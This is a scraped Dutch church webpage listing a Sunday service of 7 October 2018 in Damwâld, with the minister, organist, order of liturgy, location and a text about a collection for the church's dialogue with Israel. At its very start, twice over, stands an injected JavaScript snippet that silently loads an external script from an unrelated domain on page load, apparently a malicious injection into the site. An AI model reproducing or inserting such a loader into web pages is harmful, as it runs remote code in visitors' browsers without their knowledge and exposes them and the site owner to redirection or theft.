;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 7 oktober 2018 9:30 uur - PKN Damwâld
zondag 7 oktober 2018
09:30 uur
Koffie na de dienst

Kerkdienst zondag 7 oktober 2018 9:30 uur

Informatie

Voorganger:Ds. G.J. Otter
Organist:Ivo van Hijum
Mededeling:Koffie na de dienst
Liturgie
Lied voor de dienst Ps.111:1 en 5
Welkom en mededelingen
We zingen: ELB 194: 1 en 3
Stilgebed, Votum en groet
We zingen: ELB 461:1 en 2
Wetslezing .
We zingen: Ps.51:5
Gebed
We lezen: Psalm.33 en Jakobus.4: 13 - 17
We zingen: Ps.33:4 en 8
Preek .
We zingen: Gez.48: 4 en 9
Gebed
Collecte
Slotlied Gez. 264: 1 en 4
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Israëlzondag

Collecte Kerk en Israël - Het gesprek houdt nooit op
Voor de Protestantse Kerk is de relatie met Israël een essentieel element van de eigen identiteit. Ons geloof is voortgekomen uit de Joodse traditie. De Protestantse Kerk onderstreept de verbondenheid met het volk Israël. Op landelijk niveau zijn er contacten met Joods Nederland en komen thema's als antisemitisme ter sprake. Om plaatselijke gemeenten te stimuleren om deel te nemen aan het gesprek met en over Israël, ontwikkelt de Protestantse Kerk inspiratiematerialen, vinden er ontmoetings- en netwerkdagen plaats en verschijnt het tijdschrift Kerk en Israël Onderweg dat theologische bezinning en informatie combineert. Uw steun via de collecte maakt als deze activiteiten mogelijk. Opdat het gesprek met en over Israël nooit op zal houden

Tweede collecte: Kerk
Uitganscollecte: Kerk